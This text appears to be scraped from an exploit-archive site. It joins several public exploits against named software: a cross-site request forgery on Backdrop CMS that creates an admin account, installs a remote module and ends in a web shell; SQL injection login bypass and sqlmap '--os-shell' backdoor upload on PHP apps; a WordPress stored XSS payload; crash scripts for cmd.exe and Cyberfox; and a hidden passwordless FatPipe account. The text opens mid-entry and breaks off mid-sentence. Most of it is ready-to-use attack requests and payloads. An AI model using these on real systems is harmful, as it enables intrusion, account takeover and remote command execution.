type="text" name="form_id" value="user_register_form"> <input type="text" name="status" value="1"> <input type="text" name="roles[administrator]" value="administrator"> <input type="text" name="op" value="Create new account"> <input type="submit" value="Send"> </form> </body> </html> # Step 1 # Send this page below to the victim <html> <body> <form method="POST" action="http://example.com/backdrop/?q=system/ajax"> <input type="text" name="q" value="system/ajax"> <input type="text" name="Backdrop.tableDrag.showWeight" value="0"> <input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8"> <input type="text" name="bulk" value=""> <input type="text" name="project_url" value="https://github.com/V1n1v131r4/CSRF-to-RCE-on-Backdrop-CMS/releases/download/backdrop/reference.tar"> <input type="text" name="files[project_upload]" value=""> <input type="text" name="form_build_id" value="form-p-BrvXTDPqUhhAatHFr4d_dQKt6Dn5d-mIf4hwFyuJA"> <input type="text" name="form_token" value="aYigpmZz3OXNHnjJTO2Tu43IXMKyrMXvB2yL-4NFbTw"> <input type="text" name="form_id" value="installer_manager_install_form"> <input type="text" name="_triggering_element_name" value="op"> <input type="text" name="_triggering_element_value" value="Install"> <input type="text" name="ajax_html_ids[]" value="skip-link"> <input type="text" name="ajax_html_ids[]" value="main-content"> <input type="text" name="ajax_html_ids[]" value="installer-browser-filters-form"> <input type="text" name="ajax_html_ids[]" value="edit-search-text"> <input type="text" name="ajax_html_ids[]" value="edit-submit"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-bootstrap_lite"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-corporate_kiss"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lateral"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-colihaut"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-shasetsu"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-borg"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-pelerine"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-cleanish"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-materialize"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lumi"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-tatsu"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-mero"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-snazzy"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-afterlight_tribute"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-minicss"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-zurb_foundation_6"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-thesis"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-summer_fun"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-news_arrow"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-basis_contrib"> <input type="text" name="ajax_html_ids[]" value="installer-browser-manual-install-link"> <input type="text" name="ajax_html_ids[]" value="edit-link"> <input type="text" name="ajax_html_ids[]" value="admin-bar"> <input type="text" name="ajax_html_ids[]" value="admin-bar-wrapper"> <input type="text" name="ajax_html_ids[]" value="admin-bar-icon"> <input type="text" name="ajax_html_ids[]" value="admin-bar-menu"> <input type="text" name="ajax_html_ids[]" value="admin-bar-extra"> <input type="text" name="ajax_html_ids[]" value="admin-bar-search-items"> <input type="text" name="ajax_html_ids[]" value="ui-id-1"> <input type="text" name="ajax_html_ids[]" value="backdrop-modal"> <input type="text" name="ajax_html_ids[]" value="installer-manager-install-form"> <input type="text" name="ajax_html_ids[]" value="edit-bulk-wrapper"> <input type="text" name="ajax_html_ids[]" value="edit-bulk"> <input type="text" name="ajax_html_ids[]" value="edit-project-url-wrapper"> <input type="text" name="ajax_html_ids[]" value="edit-project-url"> <input type="text" name="ajax_html_ids[]" value="edit-project-upload-wrapper"> <input type="text" name="ajax_html_ids[]" value="edit-project-upload"> <input type="text" name="ajax_html_ids[]" value="edit-actions"> <input type="text" name="ajax_html_ids[]" value="edit-submit--2"> <input type="text" name="ajax_page_state[theme]" value="seven"> <input type="text" name="ajax_page_state[theme_token]" value="RY9h420qjWmejTKFp7C0ytS__FtpWnVmEjVCnHWFblo"> <input type="text" name="ajax_page_state[css][core/misc/normalize.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/system/css/system.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/system/css/system.theme.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/system/css/messages.theme.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/system/css/system.admin.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/layout/css/grid-flexbox.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/contextual/css/contextual.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/comment/css/comment.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/date/css/date.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/field/css/field.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/search/search.theme.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/user/css/user.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/views/css/views.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar-print.css]" value="1"> <input type="text" name="ajax_page_state[css][core/layouts/boxton/boxton.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/installer/css/installer.css]" value="1"> <input type="text" name="ajax_page_state[css][core/themes/seven/css/seven.base.css]" value="1"> <input type="text" name="ajax_page_state[css][core/themes/seven/css/style.css]" value="1"> <input type="text" name="ajax_page_state[css][core/themes/seven/css/responsive-tabs.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/opensans/opensans.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.core.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.button.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.draggable.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.resizable.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.dialog.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/dialog.theme.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.theme.css]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/html5.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/jquery.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/jquery-extend-3.4.0.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/jquery-html-prefilter-3.5.0.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/jquery.once.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/backdrop.js]" value="1"> <input type="text" name="ajax_page_state[js][core/modules/layout/js/grid-fallback.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ajax.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/jquery.form.js]" value="1"> <input type="text" name="ajax_page_state[js][core/modules/contextual/js/contextual.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/form.js]" value="1"> <input type="text" name="ajax_page_state[js][core/modules/admin_bar/js/admin_bar.js]" value="1"> <input type="text" name="ajax_page_state[js][core/modules/installer/js/installer.project_list.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/progress.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/tableheader.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/dismiss.js]" value="1"> <input type="text" name="ajax_page_state[js][core/themes/seven/js/script.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.data.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.disable-selection.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.labels.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.scroll-parent.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.tabbable.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.unique-id.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.version.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.escape-selector.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.focusable.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form-reset-mixin.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.ie.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.keycode.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.plugin.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-active-element.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-blur.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.widget.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/textarea.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.button.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.mouse.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/jquery.ui.touch-punch.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.draggable.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.position.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.resizable.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.dialog.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/dialog.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/dialog.ajax.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/collapse.js]" value="1"> <input type="submit" value="Send"> </form> </body> </html> Run on your browser: http://example.com/backdrop/modules/reference/shell.php?cmd=[command] to execute remote commands.
HireHackking

Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass

HACKER · %s · %s

# Exploit Title: Pharmacy Point of Sale System 1.0 - SQLi Authentication Bypass # Date: 23.09.2021 # Exploit Author: Janik Wehrli # Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip # Version: 1.0 # Tested on: Kali Linux, Windows 10 # Pharmacy Point of Sale System v1.0 Login can be bypassed with a simple SQLi POST /pharmacy/Actions.php?a=login HTTP/1.1 Host: 192.168.209.170 Content-Length: 38 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.209.170 Referer: http://192.168.209.170/pharmacy/login.php Accept-Encoding: gzip, deflate Accept-Language: de-CH,de-DE;q=0.9,de;q=0.8,en-US;q=0.7,en;q=0.6 Cookie: PHPSESSID=c5mtnqpcavhfgsambtnh4uklag Connection: close username='OR+1%3D1+--+-&password=PWNED
HireHackking

Microsoft Windows cmd.exe - Stack Buffer Overflow

HACKER · %s · %s

# Title: Microsoft Windows cmd.exe - Stack Buffer Overflow # Author: John Page (aka hyp3rlinx) # Date: 15/09/2021 # Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt # ISR: ApparitionSec [Vendor] www.microsoft.com [Product] cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems. [Vulnerability Type] Stack Buffer Overflow [CVE Reference] N/A [Security Issue] Specially crafted payload will trigger a Stack Buffer Overflow in the NT Windows "cmd.exe" commandline interpreter. Requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments using /c /k flags which execute commands specified by string, that will also trigger the buffer overflow condition. E.g. cmd.exe /c <PAYLOAD>. [Memory Dump] (660.12d4): Stack buffer overflow - code c0000409 (first/second chance not available) ntdll!ZwWaitForMultipleObjects+0x14: 00007ffb`00a809d4 c3 ret 0:000> .ecxr rax=0000000000000022 rbx=000002e34d796890 rcx=00007ff7c0e492c0 rdx=00007ff7c0e64534 rsi=000000000000200e rdi=000000000000200c rip=00007ff7c0e214f8 rsp=000000f6a82ff0a0 rbp=000000f6a82ff1d0 r8=000000000000200c r9=00007ff7c0e60520 r10=0000000000000000 r11=0000000000000000 r12=000002e34d77a810 r13=0000000000000002 r14=000002e34d796890 r15=000000000000200d iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 cmd!StripQuotes+0xa8: 00007ff7`c0e214f8 cc int 3 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* Failed calling InternetOpenUrl, GLE=12029 FAULTING_IP: cmd!StripQuotes+a8 00007ff7`c0e214f8 cc int 3 EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 00007ff7c0e214f8 (cmd!StripQuotes+0x00000000000000a8) ExceptionCode: c0000409 (Stack buffer overflow) ExceptionFlags: 00000001 NumberParameters: 1 Parameter[0]: 0000000000000008 PROCESS_NAME: cmd.exe ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_PARAMETER1: 0000000000000008 MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 00000000000012d4 BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE LAST_CONTROL_TRANSFER: from 00007ffafcfca9c6 to 00007ffb00a809d4 STACK_TEXT: 000000f6`a82fea38 00007ffa`fcfca9c6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!ZwWaitForMultipleObjects+0x14 000000f6`a82fea40 00007ffa`fcfca8ae : 00000000`00000098 00000000`00000096 00000000`d000022d 00000000`d000022d : KERNELBASE!WaitForMultipleObjectsEx+0x106 000000f6`a82fed40 00007ffa`fe1d190e : 00000000`00000000 000000f6`a82ff1d0 00007ff7`c0e3e000 00007ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe 000000f6`a82fed80 00007ffa`fe1d150f : 00000000`00000000 00000000`00000000 00000000`00000003 00000000`00000001 : kernel32!WerpReportFaultInternal+0x3ce 000000f6`a82feea0 00007ffa`fd05976b : 00000000`00000000 000000f6`a82ff1d0 00000000`00000004 00000000`00000000 : kernel32!WerpReportFault+0x73 000000f6`a82feee0 00007ff7`c0e26b6a : 00007ff7`c0e3e000 00007ff7`c0e3e000 00000000`0000200e 00000000`0000200c : KERNELBASE!UnhandledExceptionFilter+0x35b 000000f6`a82feff0 00007ff7`c0e26df6 : 000002e3`00000000 00007ff7`c0e10000 000002e3`4d796890 00007ff7`c0e6602c : cmd!_raise_securityfailure+0x1a 000000f6`a82ff020 00007ff7`c0e214f8 : 000002e3`4d77a810 00000000`00000000 00000000`00000002 00000000`0000200e : cmd!_report_rangecheckfailure+0xf2 000000f6`a82ff0a0 00007ff7`c0e2096f : 00000000`0000200c 000000f6`a82ff1d0 000000f6`a82ff1d0 00000000`0000200e : cmd!StripQuotes+0xa8 000000f6`a82ff0d0 00007ff7`c0e239a9 : 000002e3`4d76ff90 000002e3`4d76ff90 00000000`00000000 000002e3`4d76ff90 : cmd!SearchForExecutable+0x443 000000f6`a82ff390 00007ff7`c0e1fb9e : 00000000`00000000 000002e3`4d76ff90 ffffffff`ffffffff 000002e3`4d990000 : cmd!ECWork+0x69 000000f6`a82ff600 00007ff7`c0e1ff35 : 00007ff7`c0e4fbb0 000002e3`4d76ff90 00000000`00000000 00000000`00000001 : cmd!FindFixAndRun+0x3de 000000f6`a82ffaa0 00007ff7`c0e2277e : 00000000`00000002 000000f6`a82ffbb0 00000000`00000000 00000000`00000002 : cmd!Dispatch+0xa5 000000f6`a82ffb30 00007ff7`c0e26a89 : 00000000`00000001 00000000`00000000 00007ff7`c0e3fd78 00000000`00000000 : cmd!main+0x1fa 000000f6`a82ffbd0 00007ffa`fe1e1fe4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : cmd!wil::details_abi::ProcessLocalStorage<wil::details_abi::ProcessLocalData>::~ProcessLocalStorage<wil::details_abi::ProcessLocalData>+0x289 000000f6`a82ffc10 00007ffb`00a4efc1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14 000000f6`a82ffc40 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21 FOLLOWUP_IP: cmd!StripQuotes+a8 00007ff7`c0e214f8 cc int 3 SYMBOL_STACK_INDEX: 8 SYMBOL_NAME: cmd!StripQuotes+a8 FOLLOWUP_NAME: MachineOwner MODULE_NAME: cmd IMAGE_NAME: cmd.exe DEBUG_FLR_IMAGE_TIMESTAMP: 0 STACK_COMMAND: ~0s ; kb FAILURE_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_cmd.exe!StripQuotes BUCKET_ID: X64_APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE_MISSING_GSFRAME_cmd!StripQuotes+a8 [Exploit/POC] PAYLOAD=chr(235) + "\\CC" PAYLOAD = PAYLOAD * 3000 with open("hate.cmd", "w") as f: f.write(PAYLOAD) [Network Access] Local [Video PoC URL] https://www.youtube.com/watch?v=wYYgjV-PzD8 [Severity] Low [Disclosure Timeline] Vendor Notification: Requires running dangerous file types already. September 15, 2021 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
HireHackking

Library System 1.0 - 'student_id' SQL injection (Authenticated)

HACKER · %s · %s

# Exploit Title: Library System 1.0 - 'student_id' SQL injection (Authenticated) # Google Dork: intitle: "Library System by YahooBaba" # Date: 26/08/2021 # Exploit Author: Vinay Bhuria # Vendor Homepage: https://www.yahoobaba.net # Software Link: https://www.yahoobaba.net/project/library-system-in-php # Version: v1.0 # Tested on: Windows Description: The Library System 1.0 application from Yahoobaba is vulnerable to SQL injection via the 'student_id' parameter on the student.php page. ==================== 1. SQLi ==================== http://localhost:8081/library-system/student.php The "student_id" parameter is vulnerable to SQL injection, it was also tested, and an authenticated user has the full ability to run system commands via --os-shell and fully compromise the system POST parameter 'student_id' is vulnerable. step 1 : Navigate to the "Reg student >> View" & capture the request in the proxy tool. step 2 : Now copy the post request and save it as test.txt file. step 3 : Run the sqlmap command "sqlmap -r test.txt -p student_id --os-shell" ---------------------------------------------------------------------- Parameter: student_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: student_id=14 AND 9655=9655 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: student_id=14 OR (SELECT 5735 FROM(SELECT COUNT(*),CONCAT(0x7170717871,(SELECT (ELT(5735=5735,1))),0x716a787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: student_id=14 AND (SELECT 2937 FROM (SELECT(SLEEP(5)))UeMT) Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: student_id=14 UNION ALL SELECT NULL,NULL,CONCAT(0x7170717871,0x64697648614c6b48736a5a72484e52794d4764507670436659596379577748794a4878747162596c,0x716a787871),NULL,NULL,NULL,NULL,NULL-- - [14:03:50] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:8081/tmpbctla.php [14:03:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell> whoami do you want to retrieve the command standard output? [Y/n/a] y command standard output: 'desktop-Vinay\vinay'
HireHackking

Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)

HACKER · %s · %s

# Exploit Title: Cyberfox Web Browser 52.9.1 - Denial of Service (PoC) # Date: 2021-09-26 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://cyberfox.8pecxstudios.com # Software Link: https://www.techspot.com/downloads/6568-cyberfox-web-browser.html # Version: v52.9.1 (Possibly all versions) # Tested on: windows #[ About - Cyberfox ] : #Cyberfox is a Mozilla-based Internet browser designed to take advantage of 64-bit architecture #but a 32-bit version is also available.The application provides a higher memory performance when navigating your favorite pages. # [ Exploit/POC ] : # 1.Run the python script, it will create a new file "output.txt" # 2.Run Cyberfox Web Browser # 3.Copy the content of the file "output.txt" & Paste into the "search bar" # 4.Crashed Overflow = "\x41" * 9000000 try: f=open("output.txt","w") print("[!] Creating %s bytes DOS payload...." %len(Overflow)) f.write(Overflow) f.close() print("[!] File Created !") except: print("File cannot be created")
HireHackking
# Exploit Title: WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS) # Date: 2021-07-31 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/wappointment.2.2.4.zip # Version: 2.2.4 # Tested on: Windows # Description : Wappointment is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: name # 1) Open Wappointment Plugin or Visit booking-page http://localhost/booking-page # 2) Click on any available delivery modality (By Phone, At a Location, Video Meeting or By Skype) # 3) Select Date and Time, write your email address, your phone number and in the Full Name field type: testname"><img src=x onerror=prompt(1)> # 4) Click Confirm # 5) Login as admin to wp-admin portal, Go to Wappointment --> Calendar ( http://localhost/wordpress/wp-admin/admin.php?page=wappointment_calendar ) # Post Request (Step 4): POST /wordpress/wp-json/wappointment/v1/services/booking HTTP/1.1 Host: domain.com Content-Length: 205 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Content-Type: application/json Origin: http://domain.com Referer: http://domain.com/wordpress/booking-page/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close {"email":"testemail@testemail.com","name":"testname\"><img src=x onerror=prompt(1)>","phone":"+00 00 000000","time":1630666800,"ctz":"Europe/Bucharest","service":1,"location":3,"duration":90,"staff_id":2}
HireHackking
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) # Date: 25.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.fatpipeinc.com FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access) Vendor: FatPipe Networks Inc. Product web page: https://www.fatpipeinc.com Affected version: WARP / IPVPN / MPVPN 10.2.2r38 10.2.2r25 10.2.2r10 10.1.2r60p82 10.1.2r60p71 10.1.2r60p65 10.1.2r60p58s1 10.1.2r60p58 10.1.2r60p55 10.1.2r60p45 10.1.2r60p35 10.1.2r60p32 10.1.2r60p13 10.1.2r60p10 9.1.2r185 9.1.2r180p2 9.1.2r165 9.1.2r164p5 9.1.2r164p4 9.1.2r164 9.1.2r161p26 9.1.2r161p20 9.1.2r161p17 9.1.2r161p16 9.1.2r161p12 9.1.2r161p3 9.1.2r161p2 9.1.2r156 9.1.2r150 9.1.2r144 9.1.2r129 7.1.2r39 6.1.2r70p75-m 6.1.2r70p45-m 6.1.2r70p26 5.2.0r34 Summary: FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail. FatPipe IPVPN balances load and provides reliability among multiple managed and CPE based VPNs as well as dedicated private networks. FatPipe IPVPN can also provide you an easy low-cost migration path from private line, Frame or Point-to-Point networks. You can aggregate multiple private, MPLS and public networks without additional equipment at the provider's site. FatPipe MPVPN, a patented router clustering device, is an essential part of Disaster Recovery and Business Continuity Planning for Virtual Private Network (VPN) connectivity. It makes any VPN up to 900% more secure and 300% times more reliable, redundant and faster. MPVPN can take WANs with an uptime of 99.5% or less and make them 99.999988% or higher, providing a virtually infallible WAN. MPVPN dynamically balances load over multiple lines and ISPs without the need for BGP programming. MPVPN aggregates up to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed you need to keep your VPN up and running despite failures of service, line, software, or hardware. Desc: The application has a hidden administrative account 'cmuser' that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. Tested on: Apache-Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5684 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php 30.05.2016 25.07.2021 -- Overview: FatPipe Central Manager is a secure web based solution providing a centralized solution to manage FatPipe's suite of WAN reliability and optimization products. Central Manager allows you to configure, manage and monitor FatPipe's 